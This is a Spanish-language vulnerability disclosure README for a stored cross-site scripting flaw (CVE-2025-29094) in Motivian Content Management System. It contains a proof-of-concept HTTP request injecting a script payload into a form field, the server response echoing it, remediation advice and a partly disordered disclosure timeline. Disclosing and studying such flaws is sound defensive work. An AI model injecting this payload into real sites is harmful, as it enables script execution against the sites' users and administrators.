
Este repositorio revela una vulnerabilidad de seguridad descubierta en Motivian Content Management System v.41.0.0.
Este repositorio revela una vulnerabilidad de seguridad descubierta en Motivian Content Management System v.41.0.0.
Esta vulnerabilidad fue reportada al proveedor de acuerdo con las prácticas de divulgación responsable, y a MITRE, que asignó un ID de CVE temporal. Los detalles se están haciendo públicos tras la expiración del período de divulgación de 45 días.
Marketing/Forms, Marketing/Offers, Content/PagesUna vulnerabilidad de Cross-Site Scripting en Motivian Content Mangment System v.41.0.0 permite a un atacante remoto ejecutar código arbitrario a través de los componentes Marketing/Forms, Marketing/Offers y Content/Pages. La vulnerabilidad fue explotada inyectando código JavaScript malicioso en varios campos, incluido el título en Marketing/Form y Marketing/Offers, y el campo header script en Content/Pages.
La vulnerabilidad puede explotarse a través de varios campos en diferentes componentes. Con fines de demostración, la siguiente prueba de concepto se centra en un escenario específico:
Marketing/Forms y cree un nuevo elemento de formulario.A continuación se muestra la transcripción completa de las solicitudes y respuestas HTTP utilizadas para demostrar el problema:
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=¤tPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10"> </td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd"> </td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/HEAD/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
Sanitice toda entrada de usuario y escape la salida antes de renderizarla. Implemente la cabecera CSP (Content Security Policy) para mitigar los riesgos de XSS.
| Fecha | Acción |
|---|---|
| 2025-02-06 | Solicitud de ID de CVE (CNA: MITRE) |
Descubierta y divulgada de forma responsable por:
Francesco Marcuccio
Consultor de Ciberseguridad, Penetration Tester
Atribución del descubridor en MITRE listada como:
Francesco Marcuccio
Consultor de Ciberseguridad, Penetration Tester
Enlaces de referencia: MITRE NIST
Este ID de CVE se encuentra oficialmente en estado PUBLISHED. Será actualizado con la puntuación CVSS por NIST, tras el análisis.
| 2025-04-02 | Asignación del ID de CVE |
| 2025-04-07 | Vulnerabilidades reportadas al proveedor |
| 2025-05-31 | Divulgación pública tras la expiración del período de divulgación de 45 días (54 días en total) |
| 2025-06-04 | Registro oficial e ingreso en la base de datos de MITRE y en el portal NIST/NVD |